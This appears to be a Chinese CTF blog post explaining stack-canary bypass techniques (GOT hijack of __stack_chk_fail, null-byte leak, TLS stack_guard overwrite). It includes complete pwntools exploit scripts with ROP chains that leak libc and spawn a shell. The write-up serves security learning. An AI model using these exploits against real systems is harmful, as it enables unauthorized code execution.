<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="①劫持__stack_chk_fail函数实现Canary绕过知识点原理是触发Canary后调用来使程序退出的 stack_chk_fail()函数本身也是位于glibc中的函数，默认情况下经过ELF的延迟绑定机制，如果程序的got表具有可写权限的话，就可以通过修改其在got表中的内容实现更改跳转。假如将其got表的内容改为”ret”指令所在的地址的话，那触发 stack_chk_fail()函数">
<meta property="og:type" content="article">
<meta property="og:title" content="Canary绕过">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2021/11/08/Canary%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="①劫持__stack_chk_fail函数实现Canary绕过知识点原理是触发Canary后调用来使程序退出的 stack_chk_fail()函数本身也是位于glibc中的函数，默认情况下经过ELF的延迟绑定机制，如果程序的got表具有可写权限的话，就可以通过修改其在got表中的内容实现更改跳转。假如将其got表的内容改为”ret”指令所在的地址的话，那触发 stack_chk_fail()函数">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/checksec.jpg">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/main.jpg">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/ret.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/rewrite.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/overflow.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/main-1.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/main-2.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/stack.jpg">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-push_canary.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-checksec.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-main.jpg">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-start_routine.jpg">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-push_canary.png">
<meta property="og:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-%E5%88%86%E6%9E%90-1.jpg">
<meta property="article:published_time" content="2021-11-08T11:37:28.000Z">
<meta property="article:modified_time" content="2022-01-25T09:15:22.953Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="Canary绕过">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2021/11/08/Canary%E7%BB%95%E8%BF%87/checksec.jpg">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2021/11/08/Canary%E7%BB%95%E8%BF%87/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Canary绕过 | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2021/11/08/Canary%E7%BB%95%E8%BF%87/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Canary绕过
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-11-08 19:37:28" itemprop="dateCreated datePublished" datetime="2021-11-08T19:37:28+08:00">2021-11-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-01-25 17:15:22" itemprop="dateModified" datetime="2022-01-25T17:15:22+08:00">2022-01-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="①劫持-stack-chk-fail函数实现Canary绕过"><a href="#①劫持-stack-chk-fail函数实现Canary绕过" class="headerlink" title="①劫持__stack_chk_fail函数实现Canary绕过"></a>①劫持__stack_chk_fail函数实现Canary绕过</h2><h4 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h4><p>原理是触发Canary后调用来使程序退出的 stack_chk_fail()函数本身也是位于glibc中的函数，默认情况下经过ELF的延迟绑定机制，如果程序的got表具有可写权限的话，就可以通过修改其在got表中的内容实现更改跳转。假如将其got表的内容改为”ret”指令所在的地址的话，那触发 stack_chk_fail()函数就相当于没有跳转。</p>
<p>值得注意的是，Canary的检查的时间点是在函数返回的时候进行的，所以只有当函数即将返回时Canary才会起到作用。</p>
<h4 id="一道例题"><a href="#一道例题" class="headerlink" title="一道例题"></a>一道例题</h4><p>先检查程序保护</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/checksec.jpg" class>

<p>可以看到程序开启了Canary保护，但是RELRO保护只开了部分，说明got表此时可写（这句话好像不一定对，学到后面再来确认）。</p>
<p>main函数如下</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/main.jpg" class>

<p>接下来分析每个函数的作用，跟进到sub_4007C7()函数中</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/ret.png" class>

<p>read函数每次读取一个字节给buf（注意不是v3，赋给v3的值是read函数的返回值，read函数返回其成功读取的字节的个数，该题在正常情况下v3 == 1），可以理解sub_4007C7()函数的作用就是将读取的字符存放到字符数组nptr中，最多读取10个字符，过程中读取到回车时就直接返回。且其通过atoi()函数将字符数组nptr中的字符转换为数字返回。</p>
<p>跟进到sub_40086C()函数中</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/rewrite.png" class>

<p>可以看到这里通过sub_4007C7()函数修改v0的值就可以实现任意地址写，所以可以通过这个函数来更改__stack_chk_fail()函数的got表的内容。</p>
<p>跟进到sub_4008BB()函数中</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/overflow.png" class>

<p>这里通过sub_4007C7()函数修改nbytes的值就可以实现往a1的地址中输入几乎任意长度的数据，且传进该函数的参数v5是一个main()函数中char类型的数组，所以能通过sub_4008BB()函数实现main()函数的栈溢出。</p>
<p>分析完函数作用后分别给其改名以便观看。</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/main-1.png" class>

<p>再结合main()函数中的主逻辑来分析，当v4 == 0的时候实现进入rewrite()函数，当v4 == 1的时候进入overflow()函数，当v4 == “其他数字” 的时候main函数退出循环进行返回。</p>
<p>综上，exp如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.arch = &#x27;amd64&#x27;</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">p = process(&quot;./pwn1&quot;)</span><br><span class="line">elf = ELF(&quot;./pwn1&quot;)</span><br><span class="line">libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)</span><br><span class="line"></span><br><span class="line">ret_addr = 0x4005d9</span><br><span class="line">scf_got = elf.got[&#x27;__stack_chk_fail&#x27;]</span><br><span class="line">puts_plt = elf.symbols[&#x27;puts&#x27;]</span><br><span class="line">puts_got = elf.got[&#x27;puts&#x27;]</span><br><span class="line">pop_rdi = 0x400a03</span><br><span class="line">main_addr = 0x40090B</span><br><span class="line"></span><br><span class="line">p.sendlineafter(&quot;choice\n&quot;,&quot;0&quot;)</span><br><span class="line">p.sendlineafter(&quot;address:\n&quot;,str(scf_got))</span><br><span class="line">p.sendafter(&quot;content:\n&quot;,p64(ret_addr))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(&quot;choice\n&quot;,&quot;1&quot;)</span><br><span class="line">p.sendlineafter(&quot;size:\n&quot;,&quot;600&quot;)</span><br><span class="line">payload1 = &quot;a&quot;*0x118 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)</span><br><span class="line">p.sendlineafter(&quot;content:\n&quot;,payload1)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(&quot;choice\n&quot;,&quot;2&quot;)</span><br><span class="line">puts_addr = u64(p.recv(6).ljust(8,&quot;\x00&quot;))</span><br><span class="line">print(hex(puts_addr))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(&quot;choice\n&quot;,&quot;1&quot;)</span><br><span class="line">p.sendlineafter(&quot;size:\n&quot;,&quot;600&quot;)</span><br><span class="line"></span><br><span class="line">puts_libc = libc.symbols[&#x27;puts&#x27;]</span><br><span class="line">system_addr = puts_addr - puts_libc + libc.symbols[&#x27;system&#x27;]</span><br><span class="line">binsh = puts_addr - puts_libc + next(libc.search(&#x27;/bin/sh&#x27;))</span><br><span class="line">payload2 = &quot;a&quot;*0x118 + p64(pop_rdi) + p64(binsh) + p64(system_addr)</span><br><span class="line">p.sendlineafter(&quot;content:\n&quot;,payload2)</span><br><span class="line">p.sendlineafter(&quot;choice\n&quot;,&quot;2&quot;)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>刚开始做这道题的时候没有想到Canary的检查是在函数返回的时候才进行，就导致了一些错误。</p>
<p>这也就是为什么在发送了”2”之后才进行puts_addr的接收，因为输入”2”之后按main()函数的逻辑就会进行main()函数的返回，但是由于之前已经修改了__stack_chk_fail()函数的got表中的内容，所以可以正常劫持程序的执行流进行getshell。</p>
<p>还有一个关于read()函数引起的小细节，read()函数只会读入其第三个参数所指定的大小的字节，这其中包括’\n’，可以看到在rewrite()函数中的read()只读取八个字节，而通过p64打包发送的”ret_addr”的长度正好为8字节，所以exp的第18行需要用send而不能用sendline，使用sendline会使一个’\n’符被下一个输入函数读取从而使程序实际运行与想象中存在偏差。</p>
<h2 id="②格式化字符串泄漏Canary"><a href="#②格式化字符串泄漏Canary" class="headerlink" title="②格式化字符串泄漏Canary"></a>②格式化字符串泄漏Canary</h2><p>当程序中存在栈上的格式化字符串漏洞时，可以利用其将同样存在于栈上的Canary泄漏出来。</p>
<h2 id="③覆盖Canary的’-x00’从而打印出Canary"><a href="#③覆盖Canary的’-x00’从而打印出Canary" class="headerlink" title="③覆盖Canary的’\x00’从而打印出Canary"></a>③覆盖Canary的’\x00’从而打印出Canary</h2><p>Canary的最低一字节被设置为’\x00’，原意是防止其被输出函数连带打印出来，那么如果能够将这个’\x00’字节覆盖掉的话，就能利用输出函数连带打印出Canary。</p>
<h4 id="一道例题-1"><a href="#一道例题-1" class="headerlink" title="一道例题"></a>一道例题</h4><p>程序主逻辑如下：</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/main-2.png" class>

<p>显然在两个 read() 处都存在溢出，而且 printf() 会将buf以字符串的形式输出，那么我们只需要利用第一个 read() 函数来覆盖掉Canary的最低字节的’\x00’，printf() 就会将Canary剩下的内容打印出来。</p>
<p>我们在IDA中观察函数栈空间：</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/stack.jpg" class>

<p>buf 到 Canary 的距离为 <code>0x20 - 0x8 = 0x18</code> 个字节，加上要覆盖的一个字节共 0x19 个字节。所以我们可以构造如下payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">p.sendlineafter(&quot;warm up!!!&quot;,&#x27;a&#x27;*0x18)</span><br><span class="line">p.recvuntil(&quot;a&quot;*0x18 + &#x27;\n&#x27;)</span><br><span class="line">canary = u64(p.recv(7).rjust(8,&#x27;\x00&#x27;))</span><br></pre></td></tr></table></figure>

<p>注意这里只发送 0x18 个 “a” 是因为还有 ‘\n’ 占了一个字节。</p>
<h2 id="④修改TSL中的Canary值实现绕过Canary"><a href="#④修改TSL中的Canary值实现绕过Canary" class="headerlink" title="④修改TSL中的Canary值实现绕过Canary"></a>④修改TSL中的Canary值实现绕过Canary</h2><p>以下知识点从<a target="_blank" rel="noopener" href="https://eternalsakura13.com/2018/04/24/starctf_babystack/">Sakura 师傅的博客</a>中归纳整理</p>
<h4 id="知识点-1"><a href="#知识点-1" class="headerlink" title="知识点"></a>知识点</h4><p>为了避免多个线程同时访存同一全局变量或者静态变量时所导致的冲突，尤其是多个线程同时需要修改这一变量时，在Linux下会使用TLS（Thread Local Storage、线程局部存储）机制，其会为每一个使用该全局变量的线程都提供一个变量值的副本。</p>
<p>在glibc的实现中，TLS被指向一个segment register fs(x86-64上)，它的结构tcbhead_t定义如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">void</span> *tcb;        <span class="comment">/* Pointer to the TCB.  Not necessarily the</span></span><br><span class="line"><span class="comment">               thread descriptor used by libpthread.  */</span></span><br><span class="line">  <span class="keyword">dtv_t</span> *dtv;</span><br><span class="line">  <span class="keyword">void</span> *self;       <span class="comment">/* Pointer to the thread descriptor.  */</span></span><br><span class="line">  <span class="keyword">int</span> multiple_threads;</span><br><span class="line">  <span class="keyword">int</span> gscope_flag;</span><br><span class="line">  <span class="keyword">uintptr_t</span> sysinfo;</span><br><span class="line">  <span class="keyword">uintptr_t</span> stack_guard;</span><br><span class="line">  <span class="keyword">uintptr_t</span> pointer_guard;</span><br><span class="line">  ...</span><br><span class="line">&#125; <span class="keyword">tcbhead_t</span>;</span><br></pre></td></tr></table></figure>

<p>其中 <code>stack_guard</code> 就与Canary的设置有关：当一个函数被调用时，Canary就从 <code>tcbhead_t.stack_guard</code> 被放到栈上。当函数调用结束的时候，<strong>栈上的Canary值就会被拿来和 <code>tcbhead_t.stack_guard</code> 进行比较</strong>，如果不相等，程序就会调用 <code>___stack_chk_fail</code> 函数来进行报错行为及程序的终止。在程序中的实现如下：</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-push_canary.png" class>



<p>可以看到，在函数开辟其栈帧后，程序从 <code>fs:28h</code> 处取得值并将该值放在 <code>rbp+8</code> 处，这个就是函数设置Canary的过程。在函数即将返回的时候，<code>rbp+8</code> 处的值被拿来和 <code>fs:28h</code> 进行比较，如果不相等则调用 <code>___stack_chk_fail</code> 函数。</p>
<p>由此我们可知 fs 段寄存器或者 gs 段寄存器储存的就是结构体 <code>tcbhead_t</code> 的地址，其偏移28处就是<code>tcbhead_t.stack_guard</code>的地址</p>
<p>① 研究表明，glibc在TLS实现上存在问题，线程在pthread_create的帮助下创建，然后需要给这个新线程选择TLS。</p>
<p>② <strong>在为栈分配内存后，glibc在内存的高地址初始化TLS</strong>，在x86-64架构上，<strong>栈向下增长，将TLS放在栈顶部</strong>。</p>
<p>③ 从TLS中减去一个特定的常量值，我们得到被新线程的stack register所使用的值。</p>
<p>④ 从TLS到pthread_create的函数参数传递栈帧的距离小于一页。</p>
<p>那么由此就可以想到，如果我们能够直接对 <code>tcbhead_t.stack_guard</code> 进行修改，那么我们不需要leak出Canary的值也可以绕过Canary保护，比如利用任意地址写，同时因为TLS在栈的上方，所以如果我们溢出的数据足够大，也可以将 <code>tcbhead_t.stack_guard</code> 覆盖掉。</p>
<h4 id="starctf2018-babystack"><a href="#starctf2018-babystack" class="headerlink" title="starctf2018 babystack"></a>starctf2018 babystack</h4><p>例行检查保护</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-checksec.png" class>

<p>main()函数如下</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-main.jpg" class>

<p>程序利用 <code>pthread_create</code>  创建线程并将 <code>start_routine</code> 作为函数参数，跟进到 <code>start_routine</code> 函数</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-start_routine.jpg" class>

<p>其中<code> v1</code> 在 <code>sub_400906()</code> 中利用 <code>fget()</code> 输入，<code>sub_400957()</code> 函数实现类似 <code>fget()</code> 函数的功能</p>
<p>所以程序本身就允许我们输入最多 0x10000 个字节的数据，远大于 s[] 到 rbp 的距离，所以我们可以利用栈溢出将tcbhead_t.stack_guard覆写掉。</p>
<p>接下来寻找我们的输入与 <code>tcbhead_t.stack_guard</code> 的偏移，本题在汇编处可以看到 <code>tcbhead_t.stack_guard</code> 的地址在 fs 寄存器中</p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-push_canary.png" class>

<p>在gdb中可以使用 <code>fsbase</code> 指令来查看 fs 寄存器中的内容，由此得到 <code>tcbhead_t</code> 的地址 </p>
<img src="/2021/11/08/Canary%E7%BB%95%E8%BF%87/%E2%91%A3-%E5%88%86%E6%9E%90-1.jpg" class>

<p>由此可知我们的输入与 <code>tcbhead_t.stack_guard</code> 的偏移为 <code>0x1820 + 0x28</code> 个字节，加上8个用来覆盖的字节我们共需要输入 <code>0x1820 + 0x28 + 0x8 = 0x1850</code> 个字节的数据。</p>
<p>到此我们明确了绕过Canary的操作，接下来还需要leak出libc的地址来getshell，泄漏步骤很常规就不赘述了。这题原本我想完成泄漏后再次触发栈溢出来getshell，但是发现程序返回到再次触发栈溢出之前就崩溃了，暂时还不太理解为什么。但是因为程序本身有调用 <code>read()</code> 函数，所以我们可以在一条payload中先完成泄漏的工作，然后利用 <code>read()</code> 将ROP写入 <code>.bss</code> 段中，最后将栈迁移到 <code>.bss</code> 段中完成 ROP 。</p>
<p>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">28143</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./bs&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/home/giantbranch/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6&quot;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x0400c03</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x400c01</span></span><br><span class="line">bss = <span class="number">0x0602010</span></span><br><span class="line">leave_ret = <span class="number">0x0400B90</span></span><br><span class="line">p.sendlineafter(<span class="string">&quot;to send?&quot;</span>,<span class="built_in">str</span>(<span class="number">0x1850</span>))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x1010</span> + p64(bss+<span class="number">0x300</span>) + p64(pop_rdi) + p64(elf.got[<span class="string">&#x27;__libc_start_main&#x27;</span>]) + p64(elf.plt[<span class="string">&#x27;puts&#x27;</span>]) + p64(pop_rdi) + p64(<span class="number">0</span>) + p64(pop_rsi_r15)</span><br><span class="line">payload += p64(bss+<span class="number">0x300</span>) + p64(<span class="number">0</span>) + p64(elf.plt[<span class="string">&#x27;read&#x27;</span>]) + p64(leave_ret)</span><br><span class="line">payload = payload.ljust(<span class="number">0x1850</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recvuntil(<span class="string">&quot;It&#x27;s time to say goodbye.\n&quot;</span>)</span><br><span class="line">lsm = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(lsm)</span><br><span class="line"></span><br><span class="line">binsh = lsm - libc.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>] + libc.search(<span class="string">&quot;/bin/sh&quot;</span>).<span class="built_in">next</span>()</span><br><span class="line">execve = lsm - libc.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>] + libc.symbols[<span class="string">&#x27;execve&#x27;</span>]</span><br><span class="line">pop_rdx = lsm - libc.symbols[<span class="string">&#x27;__libc_start_main&#x27;</span>] + <span class="number">0x1b96</span></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(pop_rdi) + p64(binsh) + p64(pop_rsi_r15) + p64(<span class="number">0</span>) + p64(<span class="number">0</span>) + p64(pop_rdx) + p64(<span class="number">0</span>) + p64(execve)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>本题也可以将 one_gadget 写到 .bss 段然后执行</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/Canary%E7%BB%95%E8%BF%87/" rel="tag"># Canary绕过</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/10/30/%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E7%9B%B8%E5%85%B3/" rel="prev" title="动态链接相关">
      <i class="fa fa-chevron-left"></i> 动态链接相关
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/18/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2-1/" rel="next" title="格式化字符串">
      格式化字符串 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E2%91%A0%E5%8A%AB%E6%8C%81-stack-chk-fail%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0Canary%E7%BB%95%E8%BF%87"><span class="nav-number">1.</span> <span class="nav-text">①劫持__stack_chk_fail函数实现Canary绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">1.0.1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E9%81%93%E4%BE%8B%E9%A2%98"><span class="nav-number">1.0.2.</span> <span class="nav-text">一道例题</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E2%91%A1%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E6%BC%8FCanary"><span class="nav-number">2.</span> <span class="nav-text">②格式化字符串泄漏Canary</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E2%91%A2%E8%A6%86%E7%9B%96Canary%E7%9A%84%E2%80%99-x00%E2%80%99%E4%BB%8E%E8%80%8C%E6%89%93%E5%8D%B0%E5%87%BACanary"><span class="nav-number">3.</span> <span class="nav-text">③覆盖Canary的’\x00’从而打印出Canary</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a 